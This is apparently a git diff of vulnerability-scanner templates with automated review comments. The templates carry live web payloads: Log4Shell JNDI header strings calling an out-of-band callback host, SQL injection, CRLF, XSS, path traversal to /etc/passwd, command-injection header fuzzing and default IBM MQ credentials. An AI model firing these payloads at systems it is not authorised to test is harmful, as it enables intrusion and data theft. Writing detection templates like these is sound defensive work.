http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://github.com/cisagov/log4j-affected-db + - https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001 + - https://support.apple.com/kb/HT213189 + - http://seclists.org/fulldisclosure/2022/Mar/23 + - https://www.oracle.com/security-alerts/cpuapr2022.html + - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228 + - https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html + - http://seclists.org/fulldisclosure/2022/Jul/11 + - http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html + - http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html + - http://seclists.org/fulldisclosure/2022/Dec/2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + tags: apache,rce,log4j,critical,cve -requests: +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} + - | POST / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} payloads: log4j_payloads: + - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}' @@ -200,7 +267,7 @@ requests: - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - + attack: clusterbomb matchers-condition: or matchers: @@ -215,3 +282,5 @@ requests: name: dns words: - "dns" + +# Enhanced by topscoder 31.march.2023 \ No newline at end of file 
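Review bot: The `reference` list added in the first hunk of poc/header/log4j-header.yaml repeats the `cisco-sa-apache-log4j-qRuKNEbd` advisory URL, and the new `critical` tag duplicates what `severity: critical` already states. `name` now holds a full sentence; a short title with the detail left to `description` reads better in scan output. In the second hunk `attack: clusterbomb` is added while only one payload list, `log4j_payloads`, is visible, in which case it adds nothing over the default attack type.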
diff --git a/poc/header/oob-header-based-interaction-9250.yaml b/poc/header/oob-header-based-interaction-9250.yaml index 4e336acfcd..aa2ef33783 100644 --- a/poc/header/oob-header-based-interaction-9250.yaml +++ b/poc/header/oob-header-based-interaction-9250.yaml @@ -4,7 +4,8 @@ info: author: pdteam severity: info description: The remote server fetched a spoofed URL from the request headers. - reference: https://github.com/PortSwigger/collaborator-everywhere + reference: + - https://github.com/PortSwigger/collaborator-everywhere tags: oast,ssrf,generic requests: - method: GET diff --git a/poc/header/sqliheader.yaml b/poc/header/sqliheader.yaml index 832a9fc156..012bac2af3 100644 --- a/poc/header/sqliheader.yaml +++ b/poc/header/sqliheader.yaml @@ -1,8 +1,10 @@ id: header-sqli + info: name: Request header based sqli - author: panch0r3d + author: nithissh severity: high + requests: - method: GET path: diff --git a/poc/http/detect-dns-over-https.yaml b/poc/http/detect-dns-over-https.yaml index 65d9a2bf23..8ac33de078 100644 --- a/poc/http/detect-dns-over-https.yaml +++ b/poc/http/detect-dns-over-https.yaml @@ -21,11 +21,13 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/dns-message" - part: header + - type: regex + part: header regex: - "(C|c)ontent-(L|l)ength: 49" - part: header diff --git a/poc/http/lighttpd-default-8627.yaml b/poc/http/lighttpd-default-8627.yaml index 9038df8198..deeb3bf63f 100644 --- a/poc/http/lighttpd-default-8627.yaml +++ b/poc/http/lighttpd-default-8627.yaml 
@@ -1,19 +1,27 @@ id: lighttpd-default + info: name: lighttpd Default Page author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22 - tags: tech -requests: + metadata: + max-request: 1 + shodan-query: http.title:"Powered by lighttpd" + tags: tech,lighttpd + +http: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - "Powered by lighttpd" + - type: status status: - 200 + +# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/ibm/ibm-infoprint-lfi.yaml b/poc/ibm/ibm-infoprint-lfi.yaml index 899fad8ae8..c7df45d4c4 100644 --- a/poc/ibm/ibm-infoprint-lfi.yaml +++ b/poc/ibm/ibm-infoprint-lfi.yaml @@ -1,5 +1,4 @@ id: ibm-infoprint-lfi - info: name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal author: harshbothra_ @@ -8,7 +7,6 @@ info: reference: - https://www.exploit-db.com/exploits/47835 tags: ibm,lfi,matrix,printer - requests: - method: GET path: diff --git a/poc/ibm/ibm-mqseries-default-login-8107.yaml b/poc/ibm/ibm-mqseries-default-login-8107.yaml index 78424d3229..765cde99f4 100644 --- a/poc/ibm/ibm-mqseries-default-login-8107.yaml +++ b/poc/ibm/ibm-mqseries-default-login-8107.yaml 
@@ -1,44 +1,46 @@ -id: ibm-mqseries-default-login - -info: - name: IBM MQSeries web console default login - author: righettod - severity: high - description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. - tags: ibm,default-login - reference: - - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd - - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL - -requests: - - raw: - - | - POST /ibmmq/console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ibmmq/console/login.html - - j_username={{username}}&j_password={{password}} - - attack: pitchfork - payloads: - username: - - admin - - app - - mqadmin - password: - - passw0rd - - passw0rd - - mqadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "LtpaToken2_" - - - type: status - status: - - 302 \ No newline at end of file +id: ibm-mqseries-default-login +info: + name: IBM MQSeries Web Console Default Login + author: righettod + severity: high + description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. 
+ tags: ibm,default-login + reference: + - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd + - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /ibmmq/console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ibmmq/console/login.html + + j_username={{username}}&j_password={{password}} + attack: pitchfork + payloads: + username: + - admin + - app + - mqadmin + password: + - passw0rd + - passw0rd + - mqadmin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "LtpaToken2_" + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/ibm/ibm-note-login-8110.yaml b/poc/ibm/ibm-note-login-8110.yaml index a178a6d3b7..459d839dcb 100644 --- a/poc/ibm/ibm-note-login-8110.yaml +++ b/poc/ibm/ibm-note-login-8110.yaml @@ -1,18 +1,15 @@ id: ibm-note-login - info: name: IBM iNotes Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7122 - tags: panel - + tags: panel,ibm requests: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/names.nsf' - matchers-condition: and matchers: - type: word diff --git a/poc/ibm/ibm-service-assistant.yaml b/poc/ibm/ibm-service-assistant.yaml index 1bb221af74..08e5b2ba96 100644 --- a/poc/ibm/ibm-service-assistant.yaml +++ b/poc/ibm/ibm-service-assistant.yaml 
@@ -1,20 +1,24 @@ id: ibm-service-assistant + info: name: IBM Service Assistant author: dhiyaneshDK severity: info - tags: panel,ibm,service metadata: - shodan-query: 'http.title:"Welcome to Service Assistant"' + shodan-query: http.title:"Welcome to Service Assistant" + tags: panel,ibm,service + requests: - method: GET path: - '{{BaseURL}}/service/' + matchers-condition: and matchers: - type: word words: - 'Welcome to Service Assistant' + - type: status status: - 200 diff --git a/poc/injection/GLPI-9.3.3-SQL-Injection.yaml b/poc/injection/GLPI-9.3.3-SQL-Injection.yaml index e7c97f72d9..98a2a439f1 100644 --- a/poc/injection/GLPI-9.3.3-SQL-Injection.yaml +++ b/poc/injection/GLPI-9.3.3-SQL-Injection.yaml 
@@ -1,30 +1,25 @@ ---- -id: GLPI_SQL_Injection - -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" - -requests: - - - matchers: - - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." 
+ name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/injection/buffalo-config-injection.yaml b/poc/injection/buffalo-config-injection.yaml index ffb62416e7..d02f4693f2 100644 --- a/poc/injection/buffalo-config-injection.yaml +++ b/poc/injection/buffalo-config-injection.yaml 
@@ -4,11 +4,14 @@ info: author: gy741 severity: critical description: | - The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. + Buffalo WSR-2533DHPL2 firmware version <=1.02 and WSR-2533DHP3 firmware version <=1.24 do not properly sanitize user input via their web interfaces. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 + classification: + cve-id: CVE-2021-20090 tags: buffalo,firmware,iot requests: - raw: @@ -28,3 +31,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/06/01 diff --git a/poc/injection/crlf-injection-1262.yaml b/poc/injection/crlf-injection-1262.yaml index 54d0057103..2fe6563ca0 100644 --- a/poc/injection/crlf-injection-1262.yaml +++ b/poc/injection/crlf-injection-1262.yaml 
@@ -2,19 +2,24 @@ id: crlf-injection info: name: CRLF injection - author: melbadry9 & nadino + author: melbadry9,nadino,xElkomy severity: low + description: Improper sanitization of CRLF sequences. + tags: crlf,generic requests: - method: GET path: - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection" - - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass + - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection" - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection" - - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache - - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 + - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache + - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crl
finjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=
crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + + stop-at-first-match: true matchers: - type: regex regex: diff --git a/poc/injection/header-command-injection-7917.yaml b/poc/injection/header-command-injection-7917.yaml index e9b07459aa..9cb3402bac 100644 --- a/poc/injection/header-command-injection-7917.yaml +++ b/poc/injection/header-command-injection-7917.yaml @@ -6,18 +6,17 @@ info: description: Fuzzing headers for command injection tags: fuzz,rce requests: - - payloads: - header: helpers/payloads/request-headers.txt - payload: helpers/payloads/command-injection.txt - raw: + - raw: - | - GET /?§header§ HTTP/1.1 + GET /?{{header}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - §header§: §payload§ - Connection: close + {{header}}: {{payload}} + payloads: + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt attack: clusterbomb redirects: true + stop-at-first-match: true matchers-condition: or matchers: - type: word @@ -28,4 +27,4 @@ requests: condition: and - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/poc/injection/viewlinc-crlf-injection-11015.yaml b/poc/injection/viewlinc-crlf-injection-11015.yaml index 97e0d4e5db..199d945cd7 100644 --- a/poc/injection/viewlinc-crlf-injection-11015.yaml +++ b/poc/injection/viewlinc-crlf-injection-11015.yaml 
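Review bot: In the long query-string entry added under `path:`, `redirectUri` is the only parameter sent without a value (`&redirectUri&redirectUrl=...`), so an application that reflects that parameter into a response header is not exercised by this request. Give it the same marker value as its neighbours, `&redirectUri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUrl=...`, or drop it from the list. The hunk also removes the `~user/` path that was annotated `# CVE-2016-4975` without adding an equivalent, which presumably ends coverage for that case. The matcher regex lies outside the hunk, so whether it still fits the new paths cannot be checked from here.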
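Review bot: The replacement regex `root:.*:0:0:` in the last matcher of header-command-injection-7917.yaml is looser than the `root:[x*]:0:0:` it replaces, because `.*` is greedy and any response line containing `root:` followed later by `:0:0:` now counts as command output. If the aim is to accept hashed or empty password fields too, bound the field instead: `- "root:[^:]*:0:0:"`. With `matchers-condition: or` and the `stop-at-first-match: true` added in the previous hunk, the first false positive also ends the clusterbomb run for that host, so later header and payload combinations are never sent.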
@@ -1,16 +1,18 @@ id: viewlinc-crlf-injection + info: - name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack + name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. author: geeknik severity: low - description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned. - reference: - - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system + description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. + reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc + requests: - method: GET path: - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" + matchers-condition: or matchers: - type: word @@ -19,11 +21,10 @@ requests: - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and + - type: word words: - "Server: viewLinc/5.1.1.50" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and - -# Enhanced by mp on 2022/08/04 diff --git a/poc/injection/weiphp-sql-injection.yaml b/poc/injection/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/injection/weiphp-sql-injection.yaml +++ b/poc/injection/weiphp-sql-injection.yaml 
@@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/java/ecology-springframework-directoryTraversal.yaml b/poc/java/ecology-springframework-directoryTraversal.yaml old mode 100755 new mode 100644 diff --git a/poc/java/exposed-alps-spring-7284.yaml b/poc/java/exposed-alps-spring-7284.yaml index abbac6f138..5391725778 100644 --- a/poc/java/exposed-alps-spring-7284.yaml +++ b/poc/java/exposed-alps-spring-7284.yaml @@ -1,23 +1,16 @@ id: exposed-alps-spring - info: name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) author: dwisiswant0 severity: medium - description: Exposed Spring Data profile semantics is exposed. - reference: - - https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ - metadata: - max-request: 3 - tags: exposure,spring,files - -http: + tags: exposure + reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ +requests: - method: GET path: - "{{BaseURL}}/profile" - "{{BaseURL}}/api/profile" - "{{BaseURL}}/alps/profile" - matchers-condition: and matchers: - type: word 
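Review bot: The exposed-alps-spring-7284.yaml copy ends up unsigned and undocumented: this hunk drops `description` and `metadata.max-request` and moves `http:` back to the older `requests:` key, and the next hunk deletes the trailing `# digest:` line. A consumer that verifies template signatures will presumably report the file as unsigned, and anyone triaging a hit has only the reference link to go on. If the older revision is restored on purpose, keep a one-line description such as `description: Spring Data REST exposes its ALPS profile documents.` and state in the commit message that the signature was removed deliberately. The reverse case is keycloak-json-8472.yaml, where a `# digest:` line is added; it only has value if it verifies against this repository's bytes of that file.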
@@ -27,13 +20,10 @@ http: - "profile" condition: and part: body - - type: word words: - "application/hal+json" part: header - - type: status status: - 200 -# digest: 490a0046304402200703b103b73e6c9bfffc56b77551a83932ef1f4e983b9075e82b4a2128ffff800220240eb935da994b34aa984e070bd64175bee530216e73e19f9af3add0ee595d5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/java/java-melody-xss-8225.yaml b/poc/java/java-melody-xss-8225.yaml index 53c48c29ef..3899625c59 100644 --- a/poc/java/java-melody-xss-8225.yaml +++ b/poc/java/java-melody-xss-8225.yaml @@ -1,6 +1,7 @@ id: java-melody-xss + info: - name: JavaMelody Monitoring - Cross-Site Scripting + name: JavaMelody Monitoring XSS author: kailashbohara severity: medium description: Reflected cross site scripting (XSS) in JavaMelody monitoring. @@ -8,19 +9,23 @@ info: - https://github.com/Hurdano/JavaMelody-XSS - https://github.com/javamelody/javamelody/pull/555 tags: xss,javamelody + requests: - method: GET path: - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - '' + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/java/jboss-detect.yaml b/poc/java/jboss-detect.yaml index 5cfb12fe1d..d70d98fc0e 100644 --- a/poc/java/jboss-detect.yaml +++ b/poc/java/jboss-detect.yaml @@ -1,30 +1,22 @@ id: jboss-detect - info: name: JBoss detected - author: daffainfo,idealphase + author: daffainfo severity: info tags: tech,jboss - requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word part: body words: + - "Welcome to JBoss AS" + - "Welcome to JBoss Application Server" - "JBoss EAP 7" - - - type: regex - part: body - regex: - - '<title>Welcome to JBoss(.*)' - - extractors: - - type: regex - group: 1 - part: body - regex: - - '

Welcome to (.+)<\/h1>' + condition: or + - type: status + status: + - 200 diff --git a/poc/java/jboss-status-8241.yaml b/poc/java/jboss-status-8241.yaml old mode 100644 new mode 100755 index 704f14789a..8333db7f7b --- a/poc/java/jboss-status-8241.yaml +++ b/poc/java/jboss-status-8241.yaml @@ -1,38 +1,30 @@ id: jboss-web-console - info: - name: JBoss Management Console Server Information Page - Detect - author: dhiyaneshDK - severity: info - description: JBoss Management Console server information page was detected. - reference: - - https://www.exploit-db.com/ghdb/5215 - - https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/6.4/html/administration_and_configuration_guide/sect-the_management_console - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - metadata: - max-request: 1 - verified: true - google-query: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true - tags: jboss,unauth,edb - -http: - - method: GET - path: - - "{{BaseURL}}/web-console/ServerInfo.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - "Application Server" - - "Management Console" - condition: and - - - type: status - status: - - 200 - -# Enhanced by cs on 2023/03/10 + name: JBoss Management Console Server Information + author: + - l0ne1y + description: |- + JBoss管理控制台服务器信息泄露漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://jbossweb.jboss.org/ + 临时修复方案: + 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 + 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + words: + - Application Server + - Management Console + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/web-console/ServerInfo.jsp' + method: GET 
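Review bot: The jboss-status-8241.yaml section changes the file mode from 100644 to 100755, which marks a YAML data file as executable. Nothing in the template needs the execute bit, and other sections of this commit move templates the other way (100755 to 100644), so this looks accidental; restore `100644`. The rewritten `info` block also has no `tags`, `reference` or `classification`, so tag-filtered runs no longer select the template. Keeping `tags: jboss,unauth` and an English `description` alongside the existing text would help anyone triaging a hit.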
diff --git a/poc/java/jinfornet-jreport-lfi-8309.yaml b/poc/java/jinfornet-jreport-lfi-8309.yaml index 0dedb521b3..c25375a9bb 100644 --- a/poc/java/jinfornet-jreport-lfi-8309.yaml +++ b/poc/java/jinfornet-jreport-lfi-8309.yaml @@ -1,24 +1,19 @@ id: jinfornet-jreport-lfi - info: name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal author: 0x_Akoko severity: high reference: https://cxsecurity.com/issue/WLB-2020030151 tags: jreport,jinfornet,lfi - requests: - method: GET path: - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/java/public-tomcat-manager-9709.yaml b/poc/java/public-tomcat-manager-9709.yaml index 7accd357e0..98a6145c02 100644 --- a/poc/java/public-tomcat-manager-9709.yaml +++ b/poc/java/public-tomcat-manager-9709.yaml @@ -1,16 +1,10 @@ id: public-tomcat-manager info: - name: Apache Tomcat Manager Disclosure + name: tomcat manager disclosure author: Ahmed Sherif,geeknik severity: info - description: An Apache Tomcat Manager panel was discovered. tags: panel,tomcat,apache - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 requests: - method: GET @@ -29,5 +23,3 @@ requests: - 401 - 200 condition: or - -# Enhanced by mp on 2022/03/16 diff --git a/poc/java/shiro-detect.yaml b/poc/java/shiro-detect.yaml index b918ac9d43..d1b92dd808 100644 --- a/poc/java/shiro-detect.yaml +++ b/poc/java/shiro-detect.yaml @@ -3,14 +3,17 @@ info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro requests: - method: GET path: - '{{BaseURL}}' headers: - Cookie: rememberMe=123; + Cookie: JSESSIONID={{randstr}};rememberMe=123; + redirects: true + max-redirects: 2 matchers: - type: word - words: - - rememberMe=deleteMe part: header + words: + - 